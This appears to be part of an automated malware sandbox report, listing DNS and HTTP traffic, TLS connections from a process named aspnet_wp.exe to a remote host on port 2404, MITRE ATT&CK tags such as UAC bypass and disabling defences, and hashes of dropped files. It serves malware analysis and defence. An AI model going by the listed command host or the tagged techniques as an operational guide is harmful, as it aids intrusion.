26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

36.56.20.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

36.56.20.217.in-addr.arpa

IN PTR

Response
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

121.150.79.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.150.79.40.in-addr.arpa

IN PTR

Response

204.79.197.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GcChcGghRnDciWfBaJ34ETVUCUzlSRlB1ncXA0cqtQIXpKtbQep99ue5x2eBV6nuYBD_-fhpt9ap4kJkyfOj-UH_A3X3CfPFYoLaT8Vv3-FVPR-6WHPTuddiVwlTop-Em3jc0HD0yFX1gOIrasb91Wuk0OwS4BYz6nX0lPsba9sdB5K-%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D5eec9d228a8c10cfe0effb19ecb10def&TIME=20240508T114809Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

tls, http2

2.5kB
9.0kB
20
17

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GcChcGghRnDciWfBaJ34ETVUCUzlSRlB1ncXA0cqtQIXpKtbQep99ue5x2eBV6nuYBD_-fhpt9ap4kJkyfOj-UH_A3X3CfPFYoLaT8Vv3-FVPR-6WHPTuddiVwlTop-Em3jc0HD0yFX1gOIrasb91Wuk0OwS4BYz6nX0lPsba9sdB5K-%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D5eec9d228a8c10cfe0effb19ecb10def&TIME=20240508T114808Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GcChcGghRnDciWfBaJ34ETVUCUzlSRlB1ncXA0cqtQIXpKtbQep99ue5x2eBV6nuYBD_-fhpt9ap4kJkyfOj-UH_A3X3CfPFYoLaT8Vv3-FVPR-6WHPTuddiVwlTop-Em3jc0HD0yFX1gOIrasb91Wuk0OwS4BYz6nX0lPsba9sdB5K-%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D5eec9d228a8c10cfe0effb19ecb10def&TIME=20240508T114809Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

HTTP Response

204
88.221.83.187:443

https://www.bing.com/aes/c.gif?RG=5175af0c1d664956b49ad21f383d055b&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T114809Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

tls, http2

1.4kB
5.3kB
16
10

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=5175af0c1d664956b49ad21f383d055b&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T114809Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

HTTP Response

200
88.221.83.187:443

https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

tls, http2

1.6kB
6.4kB
17
12

HTTP Request

GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

HTTP Response

200
64.188.26.204:2404

tls

aspnet_wp.exe

3.4kB
1.8kB
14
18
64.188.26.204:2404

tls

aspnet_wp.exe

34.9kB
512.6kB
218
391
64.188.26.204:2404

tls

aspnet_wp.exe

123.5kB
1.8kB
94
29
178.237.33.50:80

http://geoplugin.net/json.gp

http

aspnet_wp.exe

623 B
1.3kB
12
3

HTTP Request

GET http://geoplugin.net/json.gp

HTTP Response

200

8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

0.204.248.87.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

0.204.248.87.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

23.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

23.159.190.20.in-addr.arpa
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

187.83.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

187.83.221.88.in-addr.arpa
8.8.8.8:53

204.26.188.64.in-addr.arpa

dns

72 B
120 B
1
1

DNS Request

204.26.188.64.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

geoplugin.net

dns

aspnet_wp.exe

59 B
75 B
1
1

DNS Request

geoplugin.net

DNS Response

178.237.33.50
8.8.8.8:53

50.33.237.178.in-addr.arpa

dns

72 B
155 B
1
1

DNS Request

50.33.237.178.in-addr.arpa
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

36.56.20.217.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

36.56.20.217.in-addr.arpa
8.8.8.8:53

11.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.227.111.52.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

121.150.79.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

121.150.79.40.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgpf5oty.h4b.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\czdvszxioagoolnhkapipoa

Filesize
4KB

MD5
135c60fadfa99b241d9109417db8b53c

SHA1
b73785818a32e8d84bb55c02ccdc3d546a615526

SHA256
01fc52f877352f6252d3d9351993fc35d7b6b0051ac6d3146184e12f9bc6e704

SHA512
76812b91e51f1a206e3829b44cf13ee4cc4e5e90d88c0b0b3755b1e092eee26e6a4b18ef038a311a9443dab138761ff45fdd18145931207764c2355047611f51

Download Submit
C:\Users\Admin\AppData\Local\Temp\file-3109.putik

Filesize
20KB

MD5
4bbb5cd3041c27a9dd85df1e35dec081

SHA1
46119374a13d578ea9049d8ea91a3abadbdeee8e

SHA256
1d8a4c2788ef4ea0d89774c48acef7ad33b4fb92c21039424a4ff10df8094826

SHA512
c4f5d110a5a91803cdb86a080ae5ab3bf7f67debdd9b71af68908099e907a9896e7c7e60e7467ef2e9800952df5b5a295e69c3877ee0a7c1e1f8532a0f6d7c76

Download Submit
memory/2024-2-0x000001BAD7AC0000-0x000001BAD7AE2000-memory.dmp

Filesize
136KB

Download
memory/2024-12-0x00007FFF38DF0000-0x00007FFF398B1000-memory.dmp

Filesize
10.8MB

Download
memory/2024-13-0x00007FFF38DF0000-0x00007FFF398B1000-memory.dmp

Filesize
10.8MB

Download
memory/2024-15-0x000001BAD7E20000-0x000001BAD7E2A000-memory.dmp

Filesize
40KB

Download
memory/2024-16-0x000001BAD7E50000-0x000001BAD7F22000-memory.dmp

Filesize
840KB

Download
memory/2024-38-0x00007FFF38DF0000-0x00007FFF398B1000-memory.dmp

Filesize
10.8MB

Download
memory/2024-1-0x00007FFF38DF3000-0x00007FFF38DF5000-memory.dmp

Filesize
8KB

Download
memory/2140-47-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3964-17-0x00007FFF38DF0000-0x00007FFF398B1000-memory.dmp

Filesize
10.8MB

Download
memory/3964-30-0x00007FFF38DF0000-0x00007FFF398B1000-memory.dmp

Filesize
10.8MB

Download
memory/3964-18-0x00007FFF38DF0000-0x00007FFF398B1000-memory.dmp

Filesize
10.8MB

Download
memory/3988-51-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3988-52-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3988-46-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4088-45-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-68-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-41-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-40-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-44-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-37-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-36-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-34-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-74-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-33-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-31-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-73-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-72-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-32-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-62-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/4088-61-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/4088-63-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-58-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/4088-64-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-65-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-66-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-67-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-39-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-69-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-70-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4088-71-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4336-48-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4336-49-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4336-50-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.